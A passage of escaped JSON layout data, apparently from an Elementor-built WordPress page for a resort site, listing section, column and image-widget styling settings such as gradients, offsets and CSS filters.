izes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"997b9fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3e8b38a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc5e9d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"47e0a38\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"e54b73a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/06\\/DSCN2502.jpg\",\"id\":204},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c97804\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"structure\":\"40\",\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11a63fa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e62a9be\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8f107cf\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"dfec8d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d31d12c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"af7353b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d0b3b35\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg